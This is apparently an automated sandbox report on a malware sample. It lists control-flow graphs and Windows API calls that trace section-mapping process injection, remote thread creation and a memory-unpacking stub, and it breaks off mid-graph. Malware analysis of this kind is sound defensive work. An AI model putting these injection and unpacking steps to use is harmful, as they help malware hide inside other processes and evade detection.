NtMapViewOfSection 3731->3734 3732->3728 3733->3723 3734->3733 3735 40163d NtMapViewOfSection 3734->3735 3735->3733 3907 40b314 3908 40b332 __close_nolock 3907->3908 3909 40b34b SetFilePointer 3908->3909 3911 40b33a 3908->3911 3910 40b363 GetLastError 3909->3910 3909->3911 3910->3911 3690 402f55 3691 4030ac 3690->3691 3692 402f7f 3690->3692 3692->3691 3693 40303a RtlCreateUserThread 3692->3693 3694 403094 NtTerminateProcess 3693->3694 3694->3691 3787 5b0001 3788 5b0005 3787->3788 3793 5b092b GetPEB 3788->3793 3790 5b0030 3795 5b003c 3790->3795 3794 5b0972 3793->3794 3794->3790 3796 5b0049 3795->3796 3797 5b0e0f 2 API calls 3796->3797 3798 5b0223 3797->3798 3799 5b0d90 GetPEB 3798->3799 3800 5b0238 VirtualAlloc 3799->3800 3801 5b0265 3800->3801 3802 5b02ce VirtualProtect 3801->3802 3804 5b030b 3802->3804 3803 5b0439 VirtualFree 3807 5b04be LoadLibraryA 3803->3807 3804->3803 3806 5b08c7 3807->3806 3736 7a7126 3737 7a7135 3736->3737 3740 7a78c6 3737->3740 3742 7a78e1 3740->3742 3741 7a78ea CreateToolhelp32Snapshot 3741->3742 3743 7a7906 Module32First 3741->3743 3742->3741 3742->3743 3744 7a7915 3743->3744 3746 7a713e 3743->3746 3747 7a7585 3744->3747 3748 7a75b0 3747->3748 3749 7a75f9 3748->3749 3750 7a75c1 VirtualAlloc 3748->3750 3749->3749 3750->3749 3808 5b0005 3809 5b092b GetPEB 3808->3809 3810 5b0030 3809->3810 3811 5b003c 7 API calls 3810->3811 3812 5b0038 3811->3812 3825 402ee1 3826 402e69 3825->3826 3828 402e9c 3825->3828 3827 401869 8 API calls 3826->3827 3827->3828 3751 41aa64 3752 41aa70 LoadLibraryW 3751->3752 3761 41a5c0 VirtualProtect 3752->3761 3755 41aa9c 3756 41a730 10 API calls 3755->3756 3758 41aaa1 3756->3758 3757 41aab9 GlobalSize 3757->3758 3758->3757 3759 41aae3 InterlockedDecrement 3758->3759 3760 41aaf7 3758->3760 3759->3758 3761->3755 3847 40c2a5 3848 40c2bb 3847->3848 3849 40c2af 3847->3849 3849->3848 3850 40c2b4 CloseHandle 3849->3850 3850->3848 3695 5b003c 3696 5b0049 3695->3696 3708 5b0e0f SetErrorMode SetErrorMode 3696->3708 3701 5b0265 3702 5b02ce VirtualProtect 3701->3702 3704 5b030b 3702->3704 3703 5b0439 VirtualFree 3707 5b04be LoadLibraryA 3703->3707 3704->3703 3706 5b08c7 3707->3706 3709 5b0223 3708->3709 3710 5b0d90 3709->3710 3711 5b0dad 3710->3711 3712 5b0dbb GetPEB 3711->3712 3713 5b0238 VirtualAlloc 3711->3713 3712->3713 3713->3701 3903 402d69 3905 402d87 3903->3905 3904 401869 8 API calls 3906 402e9c 3904->3906 3905->3904 3905->3906 3857 4014aa 3858 4014a2 3857->3858 3859 401543 NtDuplicateObject 3858->3859 3866 40165f 3858->3866 3860 401560 NtCreateSection 3859->3860 3859->3866 3861 4015e0 NtCreateSection 3860->3861 3862 401586 NtMapViewOfSection 3860->3862 3864 40160c 3861->3864 3861->3866 3862->3861 3863 4015a9 NtMapViewOfSection 3862->3863 3863->3861 3865 4015c7 3863->3865 3864->3866 3867 401616 NtMapViewOfSection 3864->3867 3865->3861 3867->3866 3868 40163d NtMapViewOfSection 3867->3868 3868->3866 3893 4030b2 3894 4030c5 3893->3894 3895 403094 NtTerminateProcess 3894->3895 3897 4030d3 3894->3897 3896 4030ac 3895->3896 3762 401874 3763 401899 3762->3763 3764 4018af Sleep 3763->3764 3765 4018ca 3764->3765 3766 4018db 3765->3766 3767 401493 7 API calls 3765->3767 3767->3766 3898 41a6b4 3899 41a6c0 3898->3899 3900 41a660 FindNextChangeNotification 3899->3900 3901 41a6e9 GetComputerNameW 3899->3901 3902 41a702 3899->3902 3900->3899 3901->3899 3768 401476 3769 401422 3768->3769 3769->3768 3770 401543 NtDuplicateObject 3769->3770 3777 4013c0 3769->3777 3771 401560 NtCreateSection 3770->3771 3770->3777 3772 4015e0 NtCreateSection 3771->3772 3773 401586 NtMapViewOfSection 3771->3773 3775 40160c 3772->3775 3772->3777 3773->3772 3774 4015a9 NtMapViewOfSection 3773->3774 3774->3772 3776 4015c7 3774->3776 3775->3777 3778 401616 NtMapViewOfSection 3775->3778 3776->3772 3778->3777 3779 40163d NtMapViewOfSection 3778->3779 3779->3777 3780 40b27c 3781 40b290 3780->3781 3782 40b28b 3780->3782 3784 40b2a1 WriteConsoleW 3781->3784 3785 40b29a 3781->3785 3786 40c286 CreateFileW 3782->3786 3784->3785 3786->3781

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 41a7a0-41a7d0 1 41a7d3-41a7d8 0->1 2 41a7e0-41a7e6 1->2 3 41a7da 1->3 4 41a7f4-41a7fa 2->4 5 41a7e8-41a7ee 2->5 3->2 4->1 6 41a7fc-41a80a 4->6 5->4 7 41a810-41a816 6->7 8 41a822-41a828 7->8 9 41a818-41a81d 7->9 10 41a832-41a839 8->10 11 41a82a-41a82c 8->11 9->8 10->7 12 41a83b-41a83e 10->12 11->10 14 41a844-41a92f InterlockedExchange SetConsoleTitleA GlobalSize FindAtomW SearchPathW SetConsoleMode GetDefaultCommConfigW CopyFileExA GetEnvironmentStringsW WriteConsoleOutputW GetNumaNodeProcessorMask DebugActiveProcessStop GetUserDefaultLangID 12->14 15 41a977-41a983 12->15 22 41a931-41a936 RtlLeaveCriticalSection 14->22 23 41a93c-41a943 14->23 16 41a985-41a99e GetSystemTimes 15->16 20 41a9a0-41a9a7 16->20 21 41a9ab-41a9b2 16->21 20->16 24 41a9a9 20->24 25 41a9c4-41a9cc 21->25 26 41a9b4-41a9be FoldStringW 21->26 22->23 27 41a955-41a974 23->27 28 41a945-41a94f LoadLibraryA 23->28 24->25 29 41aa3a-41aa55 GlobalAlloc 25->29 30 41a9ce-41aa34 GetConsoleAliasesLengthA CallNamedPipeA GetComputerNameA GetConsoleAliasExesLengthW 25->30 26->25 27->15 28->27 31 41aa57-41aa62 29->31 32 41aa8c-41aa97 LoadLibraryW call 41a5c0 29->32 30->29 35 41aa70-41aa80 31->35 40 41aa9c-41aaaf call 41a730 32->40 38 41aa82 35->38 39 41aa87-41aa8a 35->39 38->39 39->32 39->35 45 41aab0-41aab7 40->45 48 41aab9-41aac9 GlobalSize 45->48 49 41aacd-41aad3 45->49 48->49 50 41aad5 call 41a5b0 49->50 51 41aada-41aae1 49->51 50->51 53 41aae3-41aae8 InterlockedDecrement 51->53 54 41aaee-41aaf5 51->54 53->54 54->45 58 41aaf7-41ab05 54->58 59 41ab07-41ab0c 58->59 61 41ab16-41ab1c 59->61 62 41ab0e-41ab14 59->62 61->59 63 41ab1e-41ab32 61->63 62->61 62->63
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 0041A84B
                                                • SetConsoleTitleA.KERNEL32(00000000), ref: 0041A853
                                                • GlobalSize.KERNEL32(00000000), ref: 0041A85B
                                                • FindAtomW.KERNEL32(00000000), ref: 0041A863
                                                • SearchPathW.KERNEL32(0041C9D0,0041C9A0,0041C960,00000000,?,?), ref: 0041A887
                                                • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A891
                                                • GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041A8B9
                                                • CopyFileExA.KERNEL32(0041CA1C,0041CA0C,00000000,00000000,00000000,00000000), ref: 0041A8D1
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0041A8D7
                                                • WriteConsoleOutputW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0041A8F6
                                                • GetNumaNodeProcessorMask.KERNEL32(00000000,00000000), ref: 0041A900
                                                • DebugActiveProcessStop.KERNEL32(00000000), ref: 0041A908
                                                • GetUserDefaultLangID.KERNEL32 ref: 0041A922
                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0041A936
                                                • LoadLibraryA.KERNEL32(00000000), ref: 0041A94F
                                                • GetSystemTimes.KERNELBASE(?,?,?), ref: 0041A996
                                                • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A9BE
                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0041A9DD
                                                • CallNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A9EA
                                                • GetComputerNameA.KERNEL32(00000000,00000000), ref: 0041A9F2
                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 0041A9F8
                                                • GlobalAlloc.KERNELBASE(00000000,00421ECC), ref: 0041AA3D
                                                • LoadLibraryW.KERNELBASE(0041CA54), ref: 0041AA91
                                                • GlobalSize.KERNEL32(00000000), ref: 0041AABB
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041AAE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068532173.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_40b000_busaafd.jbxd
                                                Similarity
                                                • API ID: Console$Global$DefaultInterlockedLengthLibraryLoadSize$ActiveAliasAliasesAllocAtomCallCommComputerConfigCopyCriticalDebugDecrementEnvironmentExchangeExesFileFindFoldLangLeaveMaskModeNameNamedNodeNumaOutputPathPipeProcessProcessorSearchSectionStopStringStringsSystemTimesTitleUserWrite
                                                • String ID: G9@$k`$}$
                                                • API String ID: 1617017930-167184026
                                                • Opcode ID: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
                                                • Instruction ID: 9d0e60e093157893049f9d09ff6ea3b3fc32bdf03ae3aab365a71fc4c352c97f
                                                • Opcode Fuzzy Hash: 5c7a4b6f7cbe8a4fd6a37d62c592fd6ae5ac874b6fbd6add716ca7c961466e8b
                                                • Instruction Fuzzy Hash: 8D913471645210ABD320AB60DC49BDB7BA4EF4C715F01803AF619A61F0DB785581CBEF

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 150 401476-401478 151 4014c0-4014ed call 40110f 150->151 152 401479-40147a 150->152 166 4014f2-4014f7 151->166 167 4014ef 151->167 153 401422 152->153 154 40147c-401481 152->154 158 4013c0-4013de call 40110f 153->158 159 401424-401451 153->159 156 401483-401490 154->156 169 4013f9-4013fa 158->169 168 401453-401470 159->168 159->169 175 401818-401820 166->175 176 4014fd-40150e 166->176 167->166 168->156 170 401472-401474 168->170 170->150 175->166 179 401514-40153d 176->179 180 401816-401825 176->180 179->180 188 401543-40155a NtDuplicateObject 179->188 183 401834 180->183 184 40182a-40184b 180->184 183->184 189 40183c-401847 184->189 190 40184e-401866 call 40110f 184->190 188->180 191 401560-401584 NtCreateSection 188->191 189->190 193 4015e0-401606 NtCreateSection 191->193 194 401586-4015a7 NtMapViewOfSection 191->194 193->180 198 40160c-401610 193->198 194->193 196 4015a9-4015c5 NtMapViewOfSection 194->196 196->193 199 4015c7-4015dd 196->199 198->180 201 401616-401637 NtMapViewOfSection 198->201 199->193 201->180 202 40163d-401659 NtMapViewOfSection 201->202 202->180 204 40165f call 401664 202->204
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectView
                                                • String ID:
                                                • API String ID: 1652636561-0
                                                • Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                • Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
                                                • Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                • Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 401493-4014c5 214 4014d7 207->214 215 4014cb-4014d3 207->215 214->215 216 4014da-4014ed call 40110f 214->216 215->216 219 4014f2-4014f7 216->219 220 4014ef 216->220 222 401818-401820 219->222 223 4014fd-40150e 219->223 220->219 222->219 226 401514-40153d 223->226 227 401816-401825 223->227 226->227 235 401543-40155a NtDuplicateObject 226->235 230 401834 227->230 231 40182a-40184b 227->231 230->231 236 40183c-401847 231->236 237 40184e-401866 call 40110f 231->237 235->227 238 401560-401584 NtCreateSection 235->238 236->237 240 4015e0-401606 NtCreateSection 238->240 241 401586-4015a7 NtMapViewOfSection 238->241 240->227 245 40160c-401610 240->245 241->240 243 4015a9-4015c5 NtMapViewOfSection 241->243 243->240 246 4015c7-4015dd 243->246 245->227 248 401616-401637 NtMapViewOfSection 245->248 246->240 248->227 249 40163d-401659 NtMapViewOfSection 248->249 249->227 251 40165f call 401664 249->251
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                • Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
                                                • Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                • Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 4014aa-4014c5 261 4014d7 254->261 262 4014cb-4014d3 254->262 261->262 263 4014da-4014ed call 40110f 261->263 262->263 266 4014f2-4014f7 263->266 267 4014ef 263->267 269 401818-401820 266->269 270 4014fd-40150e 266->270 267->266 269->266 273 401514-40153d 270->273 274 401816-401825 270->274 273->274 282 401543-40155a NtDuplicateObject 273->282 277 401834 274->277 278 40182a-40184b 274->278 277->278 283 40183c-401847 278->283 284 40184e-401866 call 40110f 278->284 282->274 285 401560-401584 NtCreateSection 282->285 283->284 287 4015e0-401606 NtCreateSection 285->287 288 401586-4015a7 NtMapViewOfSection 285->288 287->274 292 40160c-401610 287->292 288->287 290 4015a9-4015c5 NtMapViewOfSection 288->290 290->287 293 4015c7-4015dd 290->293 292->274 295 401616-401637 NtMapViewOfSection 292->295 293->287 295->274 296 40163d-401659 NtMapViewOfSection 295->296 296->274 298 40165f call 401664 296->298
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                • Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
                                                • Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                • Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 4014b1-4014ed call 40110f 306 4014f2-4014f7 301->306 307 4014ef 301->307 309 401818-401820 306->309 310 4014fd-40150e 306->310 307->306 309->306 313 401514-40153d 310->313 314 401816-401825 310->314 313->314 322 401543-40155a NtDuplicateObject 313->322 317 401834 314->317 318 40182a-40184b 314->318 317->318 323 40183c-401847 318->323 324 40184e-401866 call 40110f 318->324 322->314 325 401560-401584 NtCreateSection 322->325 323->324 327 4015e0-401606 NtCreateSection 325->327 328 401586-4015a7 NtMapViewOfSection 325->328 327->314 332 40160c-401610 327->332 328->327 330 4015a9-4015c5 NtMapViewOfSection 328->330 330->327 333 4015c7-4015dd 330->333 332->314 335 401616-401637 NtMapViewOfSection 332->335 333->327 335->314 336 40163d-401659 NtMapViewOfSection 335->336 336->314 338 40165f call 401664 336->338
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                • Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
                                                • Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                • Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 341 4014ad-4014c5 346 4014d7 341->346 347 4014cb-4014d3 341->347 346->347 348 4014da-4014ed call 40110f 346->348 347->348 351 4014f2-4014f7 348->351 352 4014ef 348->352 354 401818-401820 351->354 355 4014fd-40150e 351->355 352->351 354->351 358 401514-40153d 355->358 359 401816-401825 355->359 358->359 367 401543-40155a NtDuplicateObject 358->367 362 401834 359->362 363 40182a-40184b 359->363 362->363 368 40183c-401847 363->368 369 40184e-401866 call 40110f 363->369 367->359 370 401560-401584 NtCreateSection 367->370 368->369 372 4015e0-401606 NtCreateSection 370->372 373 401586-4015a7 NtMapViewOfSection 370->373 372->359 377 40160c-401610 372->377 373->372 375 4015a9-4015c5 NtMapViewOfSection 373->375 375->372 378 4015c7-4015dd 375->378 377->359 380 401616-401637 NtMapViewOfSection 377->380 378->372 380->359 381 40163d-401659 NtMapViewOfSection 380->381 381->359 383 40165f call 401664 381->383
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                • Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
                                                • Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                • Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 386 4014d5-4014ed call 40110f 390 4014f2-4014f7 386->390 391 4014ef 386->391 393 401818-401820 390->393 394 4014fd-40150e 390->394 391->390 393->390 397 401514-40153d 394->397 398 401816-401825 394->398 397->398 406 401543-40155a NtDuplicateObject 397->406 401 401834 398->401 402 40182a-40184b 398->402 401->402 407 40183c-401847 402->407 408 40184e-401866 call 40110f 402->408 406->398 409 401560-401584 NtCreateSection 406->409 407->408 411 4015e0-401606 NtCreateSection 409->411 412 401586-4015a7 NtMapViewOfSection 409->412 411->398 416 40160c-401610 411->416 412->411 414 4015a9-4015c5 NtMapViewOfSection 412->414 414->411 417 4015c7-4015dd 414->417 416->398 419 401616-401637 NtMapViewOfSection 416->419 417->411 419->398 420 40163d-401659 NtMapViewOfSection 419->420 420->398 422 40165f call 401664 420->422
                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                • Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
                                                • Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                • Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 449 402f55-402f79 450 4030ac-4030b1 449->450 451 402f7f-402f97 449->451 451->450 452 402f9d-402fae 451->452 453 402fb0-402fb9 452->453 454 402fbe-402fcc 453->454 454->454 455 402fce-402fd5 454->455 456 402ff7-402ffe 455->456 457 402fd7-402ff6 455->457 458 403020-403023 456->458 459 403000-40301f 456->459 457->456 460 403025-403028 458->460 461 40302c 458->461 459->458 460->461 462 40302a 460->462 461->453 463 40302e-403033 461->463 462->463 463->450 464 403035-403038 463->464 464->450 465 40303a-4030a9 RtlCreateUserThread NtTerminateProcess 464->465 465->450
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: CreateProcessTerminateThreadUser
                                                • String ID:
                                                • API String ID: 1921587553-0
                                                • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
                                                • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                • Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 483 4030b2-4030d0 485 4030d3-4030fc 483->485 486 403094-4030b1 NtTerminateProcess 483->486 490 403104-403109 485->490 491 4030fe 485->491 492 403112-403134 call 40118b 490->492 493 40310b 490->493 491->490 494 403100-403102 491->494 500 403138 492->500 493->492 495 40310d-403110 493->495 495->492 500->500
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2068509719.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_busaafd.jbxd
                                                Similarity
                                                • API ID: ProcessTerminate
                                                • String ID:
                                                • API String ID: 560597551-0
                                                • Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                • Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
                                                • Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                • Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 65 5b003c-5b0047 66 5b0049 65->66 67 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 65->67 66->67 82 5b028b-5b0292 67->82 83 5b0265-5b0289 call 5b0a69 67->83 85 5b02a1-5b02b0 82->85 87 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 83->87 85->87 88 5b02b2-5b02cc 85->88 94 5b03d1-5b03e0 87->94 88->85 95 5b0439-5b04b8 VirtualFree 94->95 96 5b03e2-5b0437 call 5b0ce7 94->96 98 5b04be-5b04cd 95->98 99 5b05f4-5b05fe 95->99 96->94 101 5b04d3-5b04dd 98->101 102 5b077f-5b0789 99->102 103 5b0604-5b060d 99->103 101->99 105 5b04e3-5b0505 101->105 106 5b078b-5b07a3 102->106 107 5b07a6-5b07b0 102->107 103->102 108 5b0613-5b0637 103->108 116 5b0517-5b0520 105->116 117 5b0507-5b0515 105->117 106->107 109 5b086e-5b08be LoadLibraryA 107->109 110 5b07b6-5b07cb 107->110 111 5b063e-5b0648 108->111 115 5b08c7-5b08f9 109->115 113 5b07d2-5b07d5 110->113 111->102 114 5b064e-5b065a 111->114 118 5b07d7-5b07e0 113->118 119 5b0824-5b0833 113->119 114->102 120 5b0660-5b066a 114->120 121 5b08fb-5b0901 115->121 122 5b0902-5b091d 115->122 123 5b0526-5b0547 116->123 117->123 